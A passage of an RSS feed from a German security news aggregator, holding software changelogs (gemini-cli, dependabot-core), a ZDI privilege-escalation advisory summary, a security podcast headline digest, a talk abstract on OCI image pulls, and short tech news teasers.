<li>ci: use internal environment for scheduled nightly releases (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4651437952" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27865" data-hovercard-type="issue" data-hovercard-url="/google-gemini/gemini-cli/issues/27865/hovercard" href="https://github.com/google-gemini/gemini-cli/issues/27865">#27865</a>) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rmedranollamas/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rmedranollamas">@rmedranollamas</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4663727308" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27939" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27939/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27939">#27939</a></li>
<li>feat(core): Support GDC air-gapped Service Identity after auth library update by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sidhantgoyal-droid/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sidhantgoyal-droid">@sidhantgoyal-droid</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4670536229" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27956" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27956/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27956">#27956</a></li>
<li>fix(cli): handle tmux false positive background detection by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amelidev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amelidev">@amelidev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551922864" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27572" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27572/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27572">#27572</a></li>
<li>Add static eval source analyzer by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ved015/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ved015">@ved015</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4572208527" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27631" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27631/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27631">#27631</a></li>
<li>fix(config): migrate coreTools setting to tools.core by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/galz10/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/galz10">@galz10</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4668842010" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27947" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27947/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27947">#27947</a></li>
<li>fix(core-tools): resolve defensive path resolution for at-reference files by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/luisfelipe-alt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/luisfelipe-alt">@luisfelipe-alt</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4667088257" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27943" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27943/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27943">#27943</a></li>
<li>Revert "fix(core-tools): resolve defensive path resolution for at-reference files" by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/galz10/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/galz10">@galz10</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4685914753" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27992" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27992/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27992">#27992</a></li>
<li>chore(release): bump version to 0.49.0-nightly.20260617.g4d3dcdce1 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gemini-cli-robot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gemini-cli-robot">@gemini-cli-robot</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4689126213" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/28003" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/28003/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/28003">#28003</a></li>
<li>Changelog for v0.48.0-preview.0 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gemini-cli-robot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gemini-cli-robot">@gemini-cli-robot</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4687675018" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27999" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27999/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27999">#27999</a></li>
<li>fix(ci): provide fallbacks for package variables in nightly release by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/galz10/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/galz10">@galz10</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4694939619" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/28016" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/28016/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/28016">#28016</a></li>
<li>chore(deps): pin dependencies and enforce 14-day update cooldown by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/galz10/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/galz10">@galz10</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4669373167" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27948" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27948/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27948">#27948</a></li>
<li>fix(ci): append trailing slash to registry url in npmrc by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rmedranollamas/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rmedranollamas">@rmedranollamas</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4700184153" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/28038" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/28038/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/28038">#28038</a></li>
<li>feat: add eval:inventory CLI command and reporting logic by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ved015/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ved015">@ved015</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4691187614" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/28009" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/28009/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/28009">#28009</a></li>
<li>fix: resolve workspace publish failures and scheduler event loop starvation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rmedranollamas/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rmedranollamas">@rmedranollamas</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4707927237" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/28063" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/28063/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/28063">#28063</a></li>
<li>fix(ci): use wombat dressing room fallback in nightly release to prevent ENEEDAUTH by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rmedranollamas/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rmedranollamas">@rmedranollamas</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4722537313" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/28104" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/28104/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/28104">#28104</a></li>
<li>Add JSON output for eval inventory by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ved015/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ved015">@ved015</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4705367608" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/28058" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/28058/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/28058">#28058</a></li>
<li>fix/verify release npm ci ignore scripts by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rmedranollamas/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rmedranollamas">@rmedranollamas</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4731380905" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/28116" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/28116/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/28116">#28116</a></li>
<li>fix(ci): prevent workspace binary shadowing in release verification by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/galz10/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/galz10">@galz10</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4738727594" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/28132" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/28132/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/28132">#28132</a></li>
<li>Feat/tool registry discovery by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ved015/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ved015">@ved015</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4728648296" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/28113" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/28113/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/28113">#28113</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sidhantgoyal-droid/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sidhantgoyal-droid">@sidhantgoyal-droid</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4670536229" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27956" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27956/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27956">#27956</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amelidev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amelidev">@amelidev</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551922864" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27572" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27572/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27572">#27572</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/google-gemini/gemini-cli/compare/v0.48.0-nightly.20260613.g9e5599c32...v0.49.0-nightly.20260625.gd845bc5d4"><tt>v0.48.0-nightly.20260613.g9e5599c32...v0.49.0-nightly.20260625.gd845bc5d4</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[ZDI-26-367: Fuji Electric Tellus pcid64 Driver Registry APIs Exposed Dangerous Method Local Privilege Escalation Vulnerability]]></title>
<description><![CDATA[This vulnerability allows local attackers to escalate privileges on affected installations of Fuji Electric Tellus. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8. The ...]]></description>
<link>https://tsecurity.de/de/3622800/sicherheitsluecken/zdi-26-367-fuji-electric-tellus-pcid64-driver-registry-apis-exposed-dangerous-method-local-privilege-escalation-vulnerability/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622800/sicherheitsluecken/zdi-26-367-fuji-electric-tellus-pcid64-driver-registry-apis-exposed-dangerous-method-local-privilege-escalation-vulnerability/</guid>
<pubDate>Wed, 24 Jun 2026 22:39:53 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[This vulnerability allows local attackers to escalate privileges on affected installations of Fuji Electric Tellus. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2026-8108.]]></content:encoded>
</item>
<item>
<title><![CDATA[Klue me in on the breach.]]></title>
<description><![CDATA[LastPass says Klue breach affected customer information, but passwords remain secure. Attackers begin exploiting Cisco Unified CM vulnerability. CISA flags actively exploited Ubiquiti and Lantronix flaws, urges rapid patching. DifyTap flaws could expose private AI conversations across tenants. Re...]]></description>
<link>https://tsecurity.de/de/3622773/it-security-nachrichten/klue-me-in-on-the-breach/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622773/it-security-nachrichten/klue-me-in-on-the-breach/</guid>
<pubDate>Wed, 24 Jun 2026 22:38:34 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[LastPass says Klue breach affected customer information, but passwords remain secure. Attackers begin exploiting Cisco Unified CM vulnerability. CISA flags actively exploited Ubiquiti and Lantronix flaws, urges rapid patching. DifyTap flaws could expose private AI conversations across tenants. Researchers find AI plugin registry let unofficial tools masquerade as trusted software. xpl0itrs launches leak site, signaling shift toward full-service cyber extortion. Ransomware attack hits Indian auto giant Bajaj Auto. U.S. presses Meta to submit AI models for national security reviews. Alleged criminal marketplace administrator extradited to the US. U.S. expands sanctions against Cambodian scam network tied to cyber fraud operations. On today’s Industry Voices segment, we are joined by Mike Masciulli, Managing Director, Migration Products and Services at Semperis, discussing RC4 and AD Migration: The Break Scenarios Hiding in Your Source Domain. And a lesson in access control.]]></content:encoded>
</item>
<item>
<title><![CDATA[Popping podman/dockers bonnet: Unraveling the image pull process while developing for Forgejo (gpn24)]]></title>
<description><![CDATA[Developing an OCI image pull through cache for Forgejo had some interesting rabbit holes and it was surprisingly hard to get in depth information on a supposedly well known system. So I got to deep dive and do bits of research and reverse engineering to make the parts communicate properly.

In th...]]></description>
<link>https://tsecurity.de/de/3622495/it-security-video/popping-podmandockers-bonnet-unraveling-the-image-pull-process-while-developing-for-forgejo-gpn24/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622495/it-security-video/popping-podmandockers-bonnet-unraveling-the-image-pull-process-while-developing-for-forgejo-gpn24/</guid>
<pubDate>Wed, 24 Jun 2026 20:48:58 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Developing an OCI image pull through cache for Forgejo had some interesting rabbit holes and it was surprisingly hard to get in depth information on a supposedly well known system. So I got to deep dive and do bits of research and reverse engineering to make the parts communicate properly.

In this talk I'll share my insights into the process of pulling OCI images according to the distribution spec (and its slight deviations) and try to answer questions like:
	- Which requests are sent by Podman or the Docker daemon when doing `docker pull image`?
		- Whats that with the /v2 endpoint and discovery?
		- How about authentication?
	- What does the pull sequence look like?
       	- Help, I got an index manifest, what should I do?
	- How should Forgejo communicate with the daemon for a successful pull?

If there is time, I'll also share small pieces of knowledge of where the implementation sits in the Forgejo codebase and how it interacts with the existing package registry.

- PR containing the implementation: https://codeberg.org/forgejo/forgejo/pulls/11611

Licensed to the public under https://creativecommons.org/licenses/by/4.0/
about this event: https://cfp.gulas.ch/gpn24/talk/8SDDSH/]]></content:encoded>
</item>
<item>
<title><![CDATA[KI klont Stimmen und Gesichter: Dieses neue Register will festlegen, was erlaubt ist und was nicht]]></title>
<description><![CDATA[Stars wie Matthew McConaughey und Taylor Swift versuchen seit Längerem, ihre Identität vor der Imitation durch KI zu schützen. Ein neues Register soll für alle Menschen mehr Kontrolle schaffen.
weiterlesen auf t3n.de]]></description>
<link>https://tsecurity.de/de/3621295/it-nachrichten/ki-klont-stimmen-und-gesichter-dieses-neue-register-will-festlegen-was-erlaubt-ist-und-was-nicht/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3621295/it-nachrichten/ki-klont-stimmen-und-gesichter-dieses-neue-register-will-festlegen-was-erlaubt-ist-und-was-nicht/</guid>
<pubDate>Wed, 24 Jun 2026 14:18:40 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Stars wie Matthew McConaughey und Taylor Swift versuchen seit Längerem, ihre Identität vor der Imitation durch KI zu schützen. Ein neues Register soll für alle Menschen mehr Kontrolle schaffen.
<a href="https://t3n.de/news/human-consent-registry-ki-klont-stimmen-und-gesichter-dieses-neue-register-will-festlegen-was-erlaubt-ist-und-was-nicht-1749240/?utm_source=rss&amp;utm_medium=newsFeed&amp;utm_campaign=newsFeed">weiterlesen auf t3n.de</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Der neue Flaschenhals der Softwareentwicklung]]></title>
<description><![CDATA[Auf den ersten Blick mag es wie eine technische Randnotiz wirken, dass die offene Extension-Registry Open VSX jetzt als Managed Service angeboten wird. 

Tags: #Managed Services | #Softwareentwicklung]]></description>
<link>https://tsecurity.de/de/3620297/it-security-nachrichten/der-neue-flaschenhals-der-softwareentwicklung/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3620297/it-security-nachrichten/der-neue-flaschenhals-der-softwareentwicklung/</guid>
<pubDate>Wed, 24 Jun 2026 07:38:20 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1920" height="1080" src="https://www.it-daily.net/wp-content/uploads/2024/03/Softwareentwicklung_Shutterstock_1688525080.jpeg" class="attachment-full size-full wp-post-image" alt="Citizen Developer, Citizen Development, Softwareentwicklung" decoding="async" srcset="https://www.it-daily.net/wp-content/uploads/2024/03/Softwareentwicklung_Shutterstock_1688525080.jpeg 1920w, https://www.it-daily.net/wp-content/uploads/2024/03/Softwareentwicklung_Shutterstock_1688525080-300x169.jpeg 300w, https://www.it-daily.net/wp-content/uploads/2024/03/Softwareentwicklung_Shutterstock_1688525080-1024x576.jpeg 1024w, https://www.it-daily.net/wp-content/uploads/2024/03/Softwareentwicklung_Shutterstock_1688525080-768x432.jpeg 768w, https://www.it-daily.net/wp-content/uploads/2024/03/Softwareentwicklung_Shutterstock_1688525080-1536x864.jpeg 1536w" sizes="(max-width: 1920px) 100vw, 1920px" title="Der neue Flaschenhals der Softwareentwicklung 1"></p>
    Auf den ersten Blick mag es wie eine technische Randnotiz wirken, dass die offene Extension-Registry Open VSX jetzt als Managed Service angeboten wird. 

<p>Tags: <a href="https://www.it-daily.net/thema/managed-services">#Managed Services</a> | <a href="https://www.it-daily.net/thema/softwareentwicklung">#Softwareentwicklung</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v0.383.0]]></title>
<description><![CDATA[What's Changed

Bump bundled npm from 11.8.0 to 11.17.0 by @kbukum1 in #15335
Fix composer specs failure due to block-insecure feature by @AbhishekBhaskar in #15334
Add blocked_versions.ignored metric for Security-blocked update checks by @kbukum1 in #15333
Preserve original bundler checksum on B...]]></description>
<link>https://tsecurity.de/de/3620092/it-security-tools/v03830/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3620092/it-security-tools/v03830/</guid>
<pubDate>Wed, 24 Jun 2026 04:48:41 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's Changed</h2>
<ul>
<li>Bump bundled npm from 11.8.0 to 11.17.0 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kbukum1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kbukum1">@kbukum1</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4670450652" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15335" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15335/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15335">#15335</a></li>
<li>Fix composer specs failure due to <code>block-insecure</code> feature by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AbhishekBhaskar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AbhishekBhaskar">@AbhishekBhaskar</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4669672449" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15334" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15334/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15334">#15334</a></li>
<li>Add blocked_versions.ignored metric for Security-blocked update checks by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kbukum1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kbukum1">@kbukum1</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4669428834" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15333" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15333/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15333">#15333</a></li>
<li>Preserve original bundler checksum on Bundler 4.0.11+ lockfile updates by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lucasmazza/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lucasmazza">@lucasmazza</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4613742805" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15249" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15249/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15249">#15249</a></li>
<li>Generate <code>.npmrc</code> from scope property when lockfile inference fails by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AbhishekBhaskar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AbhishekBhaskar">@AbhishekBhaskar</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4625892418" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15264" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15264/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15264">#15264</a></li>
<li>Revert disabling block insecure flag in composer by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AbhishekBhaskar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AbhishekBhaskar">@AbhishekBhaskar</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4676679601" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15339" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15339/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15339">#15339</a></li>
<li>Fix no method error during fetching credentials properties by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AbhishekBhaskar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AbhishekBhaskar">@AbhishekBhaskar</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4678059280" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15340" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15340/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15340">#15340</a></li>
<li>Use only uv.lock for uv dependency graphing by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nishnha/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nishnha">@Nishnha</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4584996696" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15217" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15217/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15217">#15217</a></li>
<li>Add transitive blocked-version enforcement to updater by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/robaiken/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/robaiken">@robaiken</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4650410302" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15295" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15295/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15295">#15295</a></li>
<li>fix(npm_and_yarn): strip trailing slash from registry URL in Corepack env vars by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ajha-cs/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ajha-cs">@ajha-cs</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4664826172" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15324" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15324/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15324">#15324</a></li>
<li>Fix pre-commit cooldown bypass and incorrect PR metadata issues with grouped updates by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AbhishekBhaskar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AbhishekBhaskar">@AbhishekBhaskar</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4687420706" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15346" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15346/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15346">#15346</a></li>
<li>Surface blocking parent dependency in npm fix-unavailable message by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/thavaahariharangit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/thavaahariharangit">@thavaahariharangit</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4675903244" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15337" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15337/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15337">#15337</a></li>
<li>Skip Gradle cooldown metadata fetch when cooldown is not configured by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yeikel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yeikel">@yeikel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4519592135" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15136" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15136/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15136">#15136</a></li>
<li>Bundler: surface invalid registry gem metadata as a private source error by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kbukum1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kbukum1">@kbukum1</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4695029226" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15351" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15351/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15351">#15351</a></li>
